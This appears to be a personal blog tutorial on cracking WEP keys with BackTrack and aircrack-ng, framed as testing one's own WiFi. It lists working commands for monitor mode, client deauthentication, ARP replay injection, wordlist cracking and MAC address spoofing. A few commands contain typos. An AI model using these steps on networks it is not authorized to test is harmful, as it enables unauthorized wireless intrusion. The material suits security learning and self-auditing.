Very important: check if your own WiFi LAN is secure. You need some tools to perform these actions. Easiest way to get these tools is to download and burn the backtrack cd iso file. Start your computer and boot from the cd. Slax (live cd version of Slackware) is used for the os. Most of the tools you need to do the job run on Linux, not on Windows. And there are a lot of neat tools on this cd.
As I'm learning more I'll update this post now and then. Have fun!
Not all wifi interfaces are suitable for all the actions that are described in this article. For example: my WiFi Intel Pro 2200GB card can not 'inject' packages using the aireplay command which is explained later on. I can use special open source drivers but the firmware of the card still drops most packages . This makes cracking a WEP key much more time consuming and less interesting. Check if you got the right chispset like atheros or prism.
You need to switch your WLAN Card into monitor mode. The regular Windows drivers provided by the manufacturer will NOT support this feature. You need special drivers. Wildpackets.com provides those drivers for free, but only for a limited range of cards. Check their website for supported hardware. After you installed those drivers, you can use Airodump. There is one drawback for the Windows platform, no packet injection is supported. There are some commercial tools available, but (I think) the need a special driver too, so forget it. You need some additional Files to run Airodump, peek.dll and peek5.sys, available from wildpackets.com. Download the evaluation version of AiroPeek NX and install it, there you'll find those 2 files. Be aware that the Windows version of Airodump is no 100% stable, from time to time, if you close Airodump, peek5.sys create a BSOD, the reason is still unknown. And don't put your laptop into sleeping mode while Airodump is running, as you will get a BSOD (Blue Screen Of Death) as well! To run Aircrack you need this file: cygwin1.dll.
VMWare for Windows
It should work but only with USB-Wireless NIC's. This is due a VMWare limitation, which doesn't allow direct HW access. Your PC-Card would be mapped as a regular NIC. I can't test this, as I don't own a USB Wireless NIC.
The easiest way is to use a live distribution like Auditor or BackTrack. Those distributions are bootable from CD and packed with all the tools and drivers you need. I'm using the Proxim Orinoco Card 8480-WD, to set this card into the monitor mode, you need the madwifi driver (Auditor 2.0 for example use the driver ath_pci and this driver does not support monitor mode). As you can see, it's not that simple. Check this site for a complete listing of WLAN Adapter Chipset Directory (ok a bit outdated…). Get the BackTrack disto from here.
To crack a WEP Key, you need to collect a lot of IV's. The Aircrack readme provided those next lines:
How do I crack a static WEP key?
The basic idea is to capture as much encrypted traffic as possible using Airodump. Each WEP data packet has an associated 3-byte Initialization Vector (IV): after a sufficient number of data packets have been collected, run Aircrack on the resulting capture file.
How many IVs are required to crack WEP?
WEP cracking is not an exact science. The number of required IVs depends on the WEP key length, and it also depends on your luck. Usually, 40-bit WEP can be cracked with 300.000 IVs, and 104-bit WEP can be cracked with 1.000.000 IVs; if you're out of luck you may need two million IVs, or more.
WEP Key Crack
Prepare the interface
slax ~ # ifconfig eth0 up
slax ~ # iwconfig eth0 mode monitor
depending on your distribution you need another command to set the card into monitor mode:
# iwpriv ath0 monitor 2 1 (enables monitor mode)
# iwpriv ath0 monitor 0 1 (disables monitor mode)
Search for your WiFi network information
slax ~ # airodump-ng -c 11 -w /root/airodump eth0
Run the next two commands at the same time
slax ~ # aireplay-ng -0 25 -a <MAC address AP> -c <MAC address wifi-client> eth0
slax ~ # aireplay-ng –arpreplay -b <MAC address AP> -h <MAC address wifi-client> eth0
The first command will inject the WiFi network's AP with ARP requests. The AP will answer the client with information.
Find the key using a wordlist
slax ~ # zcat /pentest/password/dictionaries/wordlist.txt.Z >> /tmp/wordlist.txt
slax ~ # gunzip wordlist.txt.Z
slax ~ # aircrack-ng -w /tmp/wordlist.txt /root/airodump-01.cap
Configure your WLAN interface to use a WPA key
# pa_passphrase <ssid> <key> >> /etc/wpa_supplicant.conf
# wpa_supplicant -w -i <INTERFACE> [-D <driver>] -B -c /etc/wpa_supplicant.con
Connect LAN interface to your network
# ifconfig eth1 up
# dhcpcd eth1
# ifconfig eth1
Fake your mac address
Use Macshift tool to change you mac address:
> macshift 001122334455 -i "Wireless Network Connection 2"
Original Macshift Web-site here.
slax ~ # ifconfig ath0 down
slax ~ # ifconfig ath0 hw ether 00:11:22:33:44:55
slax ~ # ifconfig ath0 up